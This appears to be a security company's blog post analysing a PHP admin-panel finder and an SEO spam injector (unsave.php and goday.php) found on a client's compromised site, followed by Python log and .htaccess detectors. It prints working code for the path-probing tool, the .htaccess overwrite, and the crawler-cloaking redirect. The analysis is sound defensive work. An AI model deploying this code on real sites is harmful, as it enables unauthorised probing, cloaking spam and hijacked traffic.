Not that impressive hack tool

There is a common misconception about the tools attackers use in their malicious activity: that they must be advanced programs purpose-built to target and exploit other computers.

This is not always true, and it is not uncommon to see simplistic tools used, such as the following:

This tool uses a few lines of PHP to build an array of URL path segments, which it appends to the domain name supplied by the malicious user. It is commonly known as an admin finder, as the web page title notes (hacker group name removed).

if (isset($_POST["submit_lol"])) {
    // Target domain submitted through the HTML form
    $url = $_POST['hash_lol'];
    echo "<br /> COCOL ".$url."<br /><br />";

    // Pre-set list of common admin/login paths (the duplicates are in the original)
    $adminlocales = array("/adminweb/index.php", "/adminsekolah", "/webmaster", "/operator", "/redaktur", "/moderator", "/login@web", "/admin@web", "/adminlogin", "/loginpanel", "/adminpanel", "/login@web", "/admin1.php", "/adminweb", "/Login", "/login", "/redaktur", "/redakturweb", "/administrator", "/sika", "/develop", "/ketua", "/author", "/user", "/users", "/dinkesadmin", "/retel", "/panel", "/paneladmin", "/panellogin", "/redaksi", "/cp-admin", "/master", "/master/index.php", "/master/login.php", "/operator/index.php", "/sika/index.php", "/develop/index.php", "/ketua/index.php", "/redaktur/index.php", "/admin/index.php", "/administrator/index.php", "/adminweb/index.php", "/user/index.php", "/users/index.php", "/dinkesadmin/index.php", "/retel/index.php", "/author/index.php", "/panel/index.php", "/paneladmin/index.php", "/panellogin/index.php", "/redaksi/index.php", "/cp-admin/index.php", "/operator/login.php", "/sika/login.php", "/develop/login.php", "/ketua/login.php", "/redaktur/login.php", "/admin/login.php", "/administrator/login.php", "/adminweb/login.php");

    foreach ($adminlocales as $admin){
        // One HTTP request per candidate URL; $headers[0] is the status line
        $headers = get_headers("$url$admin");
        // eregi() (removed in PHP 7) matches "200" anywhere in the status line
        if (eregi('200', $headers[0])) {
            echo "<a href='$url$admin'>$url$admin</a> >>> KETEMU GAN!<br />";
        }
        else {
            echo "$url$admin >>> GAK BISA GAN!<br />";
        }
    }
}

The code behind the tool is almost as simple as the web page it displays. It captures the domain name submitted through the HTML form's POST request, assigns it to the $url variable, then loops over the pre-set array of common admin paths in $adminlocales, combining the two into full URLs. For each URL it sends a request with get_headers() and, if the returned status line contains "200" (the HTTP "200 OK" code), it outputs the URL as a link followed by the Indonesian text "KETEMU GAN!" (I couldn't find an accurate translation, but I assume it's "URL GOOD"). If the web server returns anything other than "200 OK", it outputs the "GAK BISA GAN!" text instead.

From there, attackers may use the results of the tool to gain access to administrator interfaces through brute force attempts.

All things considered, it's a very unsophisticated tool and could be much more efficient if run from a terminal with a proxy connection versus a compromised web server.
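As an added example (not part of the original post), the following Python detector looks for the trace this admin finder leaves in a web server's access log: one client requesting many of the paths from $adminlocales within a short window, mostly receiving 404s. The log lines and IP addresses are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Subset of the admin finder's $adminlocales list (paths taken from the tool above).
ADMIN_PATHS = {
    "/adminweb/index.php", "/adminsekolah", "/webmaster", "/operator", "/redaktur",
    "/moderator", "/login@web", "/admin@web", "/adminlogin", "/loginpanel",
    "/adminpanel", "/admin1.php", "/adminweb", "/Login", "/login", "/administrator",
    "/panel", "/paneladmin", "/cp-admin", "/admin/login.php", "/administrator/login.php",
}

# Apache combined log format: ip ident user [time] "METHOD path proto" status size ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def parse_line(line):
    """Return (ip, timestamp, path, status) or None for an unparsable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("path"), int(m.group("status"))

def find_admin_scans(lines, min_hits=5, window=timedelta(seconds=60)):
    """Map client IP -> sorted admin paths it probed, for clients that requested
    at least `min_hits` distinct admin paths within `window`. A rapid burst of
    such requests (mostly 404s) is the trace the foreach loop above leaves."""
    hits = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec[2] in ADMIN_PATHS:
            hits[rec[0]].append((rec[1], rec[2]))
    flagged = {}
    for ip, events in hits.items():
        paths = {p for _, p in events}
        times = [t for t, _ in events]
        if len(paths) >= min_hits and max(times) - min(times) <= window:
            flagged[ip] = sorted(paths)
    return flagged

# Constructed access-log lines (not from the page): one scanner, one normal visitor.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2015:10:00:01 +0000] "GET /adminweb/index.php HTTP/1.1" 404 209 "-" "-"',
    '203.0.113.7 - - [10/Jan/2015:10:00:01 +0000] "GET /adminsekolah HTTP/1.1" 404 209 "-" "-"',
    '203.0.113.7 - - [10/Jan/2015:10:00:02 +0000] "GET /webmaster HTTP/1.1" 404 209 "-" "-"',
    '203.0.113.7 - - [10/Jan/2015:10:00:02 +0000] "GET /operator HTTP/1.1" 404 209 "-" "-"',
    '203.0.113.7 - - [10/Jan/2015:10:00:03 +0000] "GET /login HTTP/1.1" 200 1532 "-" "-"',
    '198.51.100.4 - - [10/Jan/2015:10:00:05 +0000] "GET /login HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Jan/2015:10:05:00 +0000] "GET /index.html HTTP/1.1" 200 4820 "-" "Mozilla/5.0"',
]
```

Since the post notes the tool is typically run from a compromised web server, the flagged IP is usually that server rather than the attacker's own machine, which is worth remembering when acting on the finding.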

Spam SEO Injector Circumventing Defense Techniques

I was assisting a client with their compromised website and came across a file called unsave.php that was primarily used to inject a rewrite into the .htaccess file so that the SEO spam payload of the file goday.php could be delivered to certain visitors sent to the directory hosting these files:

{
    // Only rewrite when the existing .htaccess is larger than 100 bytes
    if ((filesize(".htaccess"))>100)
    {
        // Opened with "w": the parent directory's .htaccess is overwritten, not appended to
        $out = fopen("../.htaccess", "w");
        fwrite ($out, "RewriteEngine On
RewriteRule ^([A-Za-z0-9-]+).html$ goday.php?hl=$1 [L]");
        fclose($out);
    }
}   // closes the enclosing block; the rest of unsave.php is not shown in this excerpt


The added RewriteRule makes the web server hand every request for a .html file in this directory to goday.php, passing the requested file name (without the extension) in the hl query parameter.
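As an added example (not the page's or the malware author's code), this Python snippet does two things a defender would want when cleaning up such an injection: it scans .htaccess contents for RewriteRules that divert .html requests to a PHP script, and it simulates what the rule above does to a given request path. The .htaccess contents below are constructed; the injected rule is the one from unsave.php.

```python
import re

# One Apache RewriteRule line: RewriteRule <pattern> <target> [flags]
REWRITE_RE = re.compile(
    r'^\s*RewriteRule\s+(?P<pattern>\S+)\s+(?P<target>\S+)(?:\s+\[(?P<flags>[^\]]*)\])?', re.I)

def suspicious_rewrites(htaccess_text):
    """Return (line number, pattern, target) for every RewriteRule that sends
    requests for .html/.htm files to a PHP script, as the rule written by
    unsave.php does. Front-controller rules such as WordPress's route
    everything to index.php and are not flagged, because their pattern does
    not single out .html requests."""
    findings = []
    for lineno, line in enumerate(htaccess_text.splitlines(), 1):
        m = REWRITE_RE.match(line)
        if not m:
            continue
        pattern, target = m.group("pattern"), m.group("target")
        targets_html = re.search(r'\.?html?\$?$', pattern) is not None
        target_is_php = target.split("?", 1)[0].lower().endswith(".php")
        if targets_html and target_is_php:
            findings.append((lineno, pattern, target))
    return findings

def apply_rule(pattern, target, request_path):
    """Simulate a per-directory RewriteRule on one request: Apache matches the
    path relative to the directory (no leading slash) and substitutes $N
    with the captured groups. Returns the rewritten target, or None."""
    m = re.search(pattern, request_path.lstrip("/"))
    if not m:
        return None
    return re.sub(r'\$(\d)', lambda g: m.group(int(g.group(1))), target)

# Constructed .htaccess contents (not from the page): the rule written by
# unsave.php, and a standard WordPress block for comparison.
INJECTED = "RewriteEngine On\nRewriteRule ^([A-Za-z0-9-]+).html$ goday.php?hl=$1 [L]"
WORDPRESS = """# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress"""
```

Because the injected pattern leaves the dot in ".html" unescaped, any single character before "html" satisfies it; the simulation uses Python's re, which behaves the same as Apache's PCRE for this simple rule.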

The goday.php file then validates the incoming request based on the IP address, HTTP referrer, and HTTP user-agent. The file targets certain keywords in order to alter their ranking, so it is only interested in serving the SEO spam data to visitors that match its requirements for a search engine:

// In each clause "!" binds tighter than "===", so the clause is true only when
// the keyword is found at an offset greater than 0 in the User-Agent header.
// ("bot" is checked twice in the original.)
if (!strpos($_SERVER["HTTP_USER_AGENT"], "Googlebot")===false
    || !strpos($_SERVER["HTTP_USER_AGENT"], "crawler")===false
    || !strpos($_SERVER["HTTP_USER_AGENT"], "bot")===false
    || !strpos($_SERVER["HTTP_USER_AGENT"], "yahoo")===false
    || !strpos($_SERVER["HTTP_USER_AGENT"], "bot")===false)
{
    // Crawler: blank out ../.htaccess if the current .htaccess is larger than 100 bytes...
    if ((filesize(".htaccess"))>100)
    {
        $out = fopen("../.htaccess", "w");
        fwrite ($out, "");
        fclose($out);
    }
    // ...then serve the generated spam page ($page is built earlier in goday.php; not shown)
    echo $page;
}
else
{
    // Everyone else: redirect to the affiliate URL ($d and $mykeys are set earlier; not shown)
    header("Location: http://coolin[.]in/for/77?d=$d&mykeys=$mykeys&da=0910");
    exit;
}

If the requisites are met, the goday.php script sends the $page variable, which holds a web page generated on the fly. This on-the-fly SEO keyword spam is possible because the attackers keep multiple templates: web pages that contain no text until the goday.php script adds the keywords. Here is an example of one of the templates before it has been filled with the SEO keywords:

If the requisites aren't met, the goday.php script instead redirects the visitor to the attackers' affiliate/pay-per-click URL, which ends up sending them to a pornographic website through their affiliate ID. Either way they try to monetize the request: through SEO spam keyword rank boosting or by sending the visitor through their affiliate URL.

One of the interesting functions included in the injector file, unsave.php, was the following:

There are WordPress and other CMS plugins that scan website files and, when they find a file deemed malicious, append ".suspected" to the end of the filename so the file can no longer be executed through the browser. The function (shown above) demonstrates how a malicious user could take this into account and build functions into their malware that automatically rename .suspected files when they are found. The malware would thereby circumvent the security plugin's renaming and continue serving the payload within the goday.php file.

If you need any help while dealing with issues similar to this one, don't hesitate to contact us. 🙂

This note is related to our recent blog post about a web spam infection via zip file upload.